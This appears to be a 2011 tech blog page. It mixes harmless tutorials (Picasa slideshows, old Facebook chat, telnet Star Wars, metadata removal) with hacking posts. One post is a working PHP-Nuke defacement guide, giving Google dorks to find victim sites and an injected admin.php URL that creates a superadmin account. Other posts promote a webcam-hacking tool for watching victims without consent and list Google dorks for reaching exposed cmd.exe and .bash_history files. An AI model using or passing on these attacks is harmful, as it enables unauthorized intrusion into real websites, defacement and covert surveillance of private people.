Saturday, August 20, 2011

ok

How to Embed Picasa Photos Slideshow on your Site

Picasa is a photo sharing website from Google, having many features for the users. It allows you to create albums on the fly, upload pictures into them and download them when you want. If you ever accidentally delete photos from your hard drive, then you can have the online backup with Google Picasa. Currently, it gives you space of 1GB, which is good enough for the photos. However, if you need more space, then you can always upgrade to premium.
piclens google image search How to Embed Picasa Photos Slideshow on your Site
Let’s come to the point, with having photos in your Picasa Web Album, you might want to embed them on your site. For this, Picasa has very easy solution which lets you embed picasa photos on your site. Here goes the steps to embed picasa photos on your site.
  • Go to Picasa Web and then choose your photo album.
  • On the right sidebar, you can see the option saying Link to this album. Click on it.
  • Now, a menu will fall down, choose the Embed Slideshow option.how to embed picasa photos on your site1 How to Embed Picasa Photos Slideshow on your Site
  • It will pop-out a dialog box, just set the settings as per your choice and see the preview on the right side.
  • Now, in the same dialog box, you can see a code snippet, which you can use to embed photos on your site. Just copy it and paste on your site where you want the slideshow to appear.
Be aware that the Picasa uses the Adobe Flash for slideshows, so the visitors must have it installed in order to see the slideshow.

How to Get Old Facebook Chat Bar

Recently, Facebook rolled out some new features and revamped the older things to make them more useful. The Facebook Video Chat was one of them, it lets you make video chats with your Facebook friends from your PC. As the Video chat got added, the Chat box changed to a new look. Having a new look, some users feel difficult to use it. So, here is the guide which will help you revert back to the old Facebook chat box.
How To Get Old Facebook Chat Box How to Get Old Facebook Chat Bar

How to Revert back to Old Facebook Chat:

There are two ways to get the old Facebook chat box, first one is to use the direct chat link and the second one is to use Greasemonkey script. Here goes the guide for both of the ways.

First Way to Get Old Facebook Chat

The first way is simple and very easy. I have already talked about this in one of my posts. Just go to the http://www.facebook.com/presense/popout.php and make chat with your friends. This way of old Facebook chat doesn’t require any further steps.

Second Way to Revert Back to Old Facebook Chat

The Second way is based on the Firefox-Greasemonkey combination. In this, you will need Firefox installed and the Greasemonkey, too. After installing the Greasemonkey, just download the Facebook Sidebar Chat Reversion script for Greasemonkey. Now, you will be able to access the old chat box on the Facebook. To try it out, go to your Facebook profile page. Since the Google Chrome has Greasemonkey support, you can use this way in the Chrome, too.
The above two ways to get the old Facebook chat box will surely help you, if you have any problem regarding this, then post in the comments.

Watch Star Wars Movie in Windows Command Prompt

Star Wars Movie is available in ASCII format, allowing you to watch it in the Windows command prompt. Yeah, you heard it right. With the Command Prompt version of the movie, you can really enjoy the Star Wars movie in your PC. I’d found this trick a long ago, so for you guys, I am posting it here. First of all, you need Telnet in your Windows. In XP, it comes preinstalled. For Windows Vista/7 users, read How to Enable Telnet in Windows 7 to enable the same in your OS. After doing so, go ahead and follow the steps given below.
Watch Star Wars Movie in Windows Command Prompt Watch Star Wars Movie in Windows Command Prompt
  • First, Open the Command Prompt either from the start menu or Windows Key+R, then type CMD in the Run box.
  • In the command prompt, type the command telnet towel.blinkenlights.nl and press Enter.
That’s it. The movie will now begin to start, have some popcorn with you to double enjoy the movie.

How to Remove Metadata from Images

Each photo you take with your Digicam, embeds Metadata with it. In simple words, metadata is the extra information which is added to the image when you capture it. Digicams automatically add the data, such as the Camera Lens size, Date, etc. So, the other image viewers can read this data and have access to them. If you are going to publish those images on Internet, then first you should clear/remove the metadata from the image. To do so, here goes the tutorial. At the end, you will be having a clear image, without any type of metadata.
How to Remove Metadata from Images How to Remove Metadata from Images
To remove metadata from your images, you will need a small utility called QuickFix which can be obtained freely from its official site. After getting it installed, follow these steps.
  • Open QuickFix from the desktop icon.
  • Now, Drag and Drop the images from your hard drive to the QuickFix Window. It will show you the list of the files.
  • After adding all the files, click on Quick Fix Metadata button.
  • In just seconds, it will remove the metadata from the images.
That’s it. Now, you have a clean copy of your image without any type of metadata, you can publish that image anywhere you like without showing the metadata.
See our How To collection for more tutorials.

Download Windows 8 Tweaker Tool

Though Windows 8 hasn’t released yet, leaked versions of it coming out on the Internet. With the help of these leaked versions, a tweaker tool for the Windows 8 has been created. The Windows 8 is expected to release in 2012, but till then, we can enjoy it with the leaked versions. New Ribbon User Interface, Inbuilt PDF Reader and a Web cam app has been seen in the leaked versions of Windows 8. The tweaker tool, as it used to work in the Windows 7, will work with this too and help you to get the most out of the Windows 8.
Download Windows 8 Tweaker Tool Download Windows 8 Tweaker Tool

Windows 8 Tweaker Tool

  • Tweaker Tool lets you enable/disable the Windows Explorer Ribbon UI with a single click.
  • Webcam app can be activated using this tweaker tool.
  • Something new, PDF reader in the Windows 8 can be enabled with this tool.
  • Windows 8 contains an advanced task manager which gives you more options to handle the tasks on your PC. This tool can activate it.
  • You can enable all the hidden features of Windows 8 using this tool.
This free and easy to use Tweaker tool lets you reveal the new features of the Windows 8. Hope you like it !

Tuesday, August 16, 2011

World's first hack-free software

MELBOURNE: A team of Australia's ICT Research Centre of Excellence's spinout company Open Kernel Labs (OK Labs) developed a microkernel The 'seL4' and claimed it to be the the world's first hack-free software which can protect systems from failure or malicious attacks.  It is a small operating system kernel which regulates access to a computer's hardware. Its unique feature is that it has been mathematically proven to operate correctly, enabling it to separate trusted from untrusted software, protecting critical services from a failure or a malicious attack, say the scientists.


In future applications, seL4 could ensure that trusted financial transaction software from secure sources like banks or stock exchanges can operate securely on a customer's mobile phone alongside "untrusted" software, such as games downloaded from the Internet, according to its developers.


Lead scientist Gerwin Klein said, "Our seL4 microkernel is the only operating system kernel in existence whose source code has been mathematically proven to implement its specification correctly. Under the assumptions of the proof, the seL4 kernel for ARM11 will always do precisely what its specification says it will do." 


  1. SOURCE: TOI

    World's first hack-free software developed

how to deface php nuke websites

Today i am going to show you, how to deface a php nuke website. 


Go to the Google http://www.google.com  
type this in search box:


allinurl:.com/nuke/index.php
allinurl:.org/nuke/index.php


Now find a target from the search results 
next steps are:



1. www.targetwebsite.com/nuke/index.php
2. www.targetwebsite.com/nuke/admin.php
index.php earlier changed the above into admin.php


3. Enter the given code just after the url 


?op=AddAuthor&add_aid=h4ck3r&add_name=God&add_pwd=h4ck3r add_email=h4ck3r@gmail.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox


ex :

www.targetwebsite.com/nuke/admin.php?op=AddAuthor&add_aid=h4ck3r&add_name=God&add_pwd=h4ck3r&add_email=h4ck3r@gmail.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox


If i was successful, then the url  will appear
www.targetwebsite.com/nuke/admin.php?op=mod_author


5. There you are logged in the order, enter a password before you.
I still remember?
id = h4ck3r 
password = h4ck3rt 


you are now into the "Administration Menu" sites.


The next step is defacing the website....
just do it by yourself...
:P




please comment below if this post is useful for you..

Wfuzz v.2.0 released | Web application bruteforcer

Wfuzz v.2.0 released | Web application bruteforcer 

Recover passwords of zip and rar files with Advanced Archive Password Recovery Professional 4.53


Advanced Archive Password Recovery Professional 4.53 | 2.4 MB
Advanced Archive Password Recovery recovers protection passwords or unlocks encrypted ZIP and RAR archives created with all versions of popular archivers. Recover passwords for plain and self-extracting archives created with PKZip and WinZip, RAR and WinRAR automatically or with your assistance. Guaranteed unlocking of archives created with WinZip 8.0 and earlier in under one hour is possible by exploiting an implementation flaw.Advanced Archive Password Recovery features ultimate compatibility among the various types of archives, knows weaknesses of certain types of protection, and provides best-in-class performance in unlocking all types of archives.


Features and Benefits:

Supports all versions of ZIP/PKZip/WinZip, RAR/WinRAR, as well as ARJ/WinARJ, and ACE/WinACE (1.x)
Guaranteed recovery of archives in under 1 hour for ZIP archives created with WinZip 8.0 and earlier and containing at least 5 files
Supports archives over 4 GB and self-extracting archives
Supports strong AES encryption found in WinRAR and the new versions of WinZip
Exploits all known vulnerabilities and implementation flaws in the various compression algorithms for faster recovery
Speedy known-plaintext attack recovers certain ZIP and ARJ archives in minutes (user must supply at least one unprotected file from that archive)
Interrupt and resume operation at any time
Supports background operation by utilizing idle CPU cycles only
Dictionary and brute-force attacks with user-defined masks and advanced templates
Highly optimized low-level code for optimum performance

Home Page – http://www.elcomsoft.com/archpr.html

Download links:




Image by Cool Text: Free Logos and Buttons - Create An Image Just Like This

Protect your system from spywares by Scan Spyware 3.9.2


Scan Spyware 3.9.2 | 8.5 MB
ScanSpyware – a program that will detect and remove spyware from your computer modules, embedded in the browser panel, various tracers and any other rubbish that can penetrate into your computer when using the Internet. Recommended for use if: you have a new unknown button or bar in your browser, dramatically increased the number of popup windows and advertising in view of different sites, your home page in the browser has changed without your knowledge, your search engine was changed, the computer or Internet speed declined sharply; you find on your computer unknown to you the program, place the disk begins to fall for no apparent reason, your modem periodically connects you to the network. These problems will help you cope Scan Spyware.


ScanSpyware removes spyware, adware and other malicious programs safely from your PC offering you a fast and smooth web surfing with a complete protection to your privacy. ScanSpyware comes with life time spyware database updates. The trial version is equipped with a complete and very powerful Scan Engine, which is capable of generating a detailed log file containing information about infected files and registry entries.

ScanSpyware protects you from:
Spyware
Adware
Malware
Keyloggers
Trojans
Indentity Thieves
Hijackers
Tracking Threats
Virus

Feature List
Fastest Scan Engine
Powerful Removal
Boot Time Removal
Automatic Log Creation
Quarantine / Restore
Embedded Threat Submission Form
Embedded System Analysis Tool
Embedded Malware Search Tool
Automatic Updates


Download links:

free download Webcam Hack V2.0


007 Webcam Hack V2.0 | 8 Mb

This a nice tool to hack webcam in many chat messengers. WebcamHack007 allows users to see the Webcam of victim without the consent of that person.



Google hacking


Google hacking doesn't mean to hack Google. Google hacking term used when a hacker tries to find vulnerable targets or sensitive data by using the Google search engine.In Google hacking hackers use search engine commands to locate sensitive data and vulnerable devices on the Internet. Google supports a multitude of operators and modifiers that add a ton of power to google searching.
Although Google hacking techniques are against Google terms of service and Google blocks well-known Google hacking queries, nothing can stop hackers from crawling websites and launching Google queries.
I am going to explain some operators used in Google hacking

intitle:
Syntax: intitle:operator 
This will return all the pages that have word entered after the intitle (as we used operator here) in the title of the page. If you want to check for multiple keywords in title use allintitle in place of intitle.
allintitle:operator1 operator2....

inurl:
Syntax: inurl:operator
This will return all the pages that have word entered after the inurl in the url of a page. If you want to check for multiple keywords in url use allinurl in place of inurl
allinurl:operator1 operator2 ....

site:
Syntax: site:Domain
This will return all the pages that have certain keywords in that particular site or domain.

link:
Syntax: link:URL
This will list down webpages that have links to the specified webpage.

intext:
Syntax: intext:operator
This will return all the pages that have word entered after the intext in the particular website. If you want to check for multiple keywords in website use allintext in place of intext
allintext:operator1 operator2 ....

related:
Syntax: related:URL
The “related:” will list web pages that are "similar" to a specified web page. For Example:
“related:www.ethicalhack4u.blogspot.com” will list web pages that are similar to the 
ethicalhacking homepage
 
Note T
here can be no space between the "related:" and the web page url.

cache:
Syntax: cache:URL [highlight]
The cache operator will search through google’s cache and return the 
results based on those documents. You can alternatively tell cache to 
highlight a word or phrase by adding it after the operator and URL.

info:
Syntax: info:URL
This tag will give you the information that Google has on the given URL.

filetype:
Syntax: 
filetype
:keyword
This will restricts Google search for files on internet with particular extensions (i.e. doc, pdf 
or ppt etc).

Well, the Google’s query syntaxes discussed above can really 
help people to precise their search and get what they are 
exactly looking for.

Looking for vulnerable sites or servers using “inurl:” or “allinurl:”

Using “allinurl:winnt/system32/” will list 
down all the links to the server which gives you access to those
restricted directories like “system32” through web. If you are 
lucky enough then you might get access to the cmd.exe in the 
“system32” directory. Once you have the access to “cmd.exe” 
and are able to execute it then you can go ahead in further 
escalating your privileges over the server and compromise it.

Using “inurl:.bash_history” will list down 
all the links to the server which gives access to 
“.bash_history” file through web. This is a command history 
file. This file includes the list of command executed by the 
administrator, and sometimes includes sensitive information 
such as password typed in by the administrator. If this file 
is compromised and if contains the encrypted unix (or *nix) 
password then it can be easily cracked using “John The 
Ripper”.